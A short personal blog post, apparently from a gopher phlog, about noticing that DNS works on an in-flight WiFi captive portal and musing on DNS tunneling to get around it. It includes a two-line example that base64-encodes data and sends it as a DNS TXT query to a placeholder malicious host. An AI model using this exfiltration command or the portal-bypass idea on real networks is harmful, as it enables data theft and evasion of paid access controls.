Using DNS to bypass hotspot WiFi
──────────────────────────────────────────────────────────────────────

I took the plane yesterday, and realized that some companies now «
offer » a free wifi service on-board, so you can access the internet
while flying. They don't really offer anything though, as you must
register your email address on a captive portal, and even pay a fee to
get full internet access (instead of just « messaging apps »).

I tried to access the internet using curl(1) directly, to see if you
could use protocols like gopher, or even smtp without registering.
Turns out you can't.
However, I noticed that I could resolve all the hostnames I wanted !
Which means DNS request reach the internet without needing you to
register on the portal. It immediately reminded me a technique I read
about in the past, and forgot: DNS tunneling.

DNS tunneling is usually used as a data exfiltration method in cybrr
attack. It assumes DNS traffic goes to the internet unfiltered, so a
malware can use DNS queries to export data to an external server. For
example:

   pl=$(echo "hidden data" | base64)
   dig +short TXT $pl @gimmedata.ns1.malicious.tld

The data can then be retrieved from the logs, or a modified DNS server
could even reconstruct it. This is bad though, and you shouldn't do it.

However, abusing the DNS payload to send data over the internet is an
interesting idea. Instead of exfiltrating data, you could use the
remote DNS as a proxy or VPN, and access the clearnet by wrapping all
your outgoing traffic in DNS queries, that would be replayed by the
external server, and responded via DNS replies !

It could work i  theory, but has 2 major downsides: first, it would be
horribly slow. The DNS payload is limited to something like 512 bytes,
so that means fragmenting your traffic so it fits in a DNS request.
Same for replies.
The second drawback is that it generates a lot of DNS traffic,
potentially marking you as an attacker in the network you're trying to
bypass, which could lead to problems.

I though it was a fun idea to explore, and I wonder if such a proxying
method has been tested already ?

Having such a DNS web proxy in your toolbox could be pretty helpful
from time to time !
--
~wgs
20200926.1342

You are viewing proxied material from phlog.z3bra.org. The copyright of proxied material belongs to its original authors. Any comments or complaints in relation to proxied material should be directed to the original authors of the content concerned. Please see the disclaimer for more details.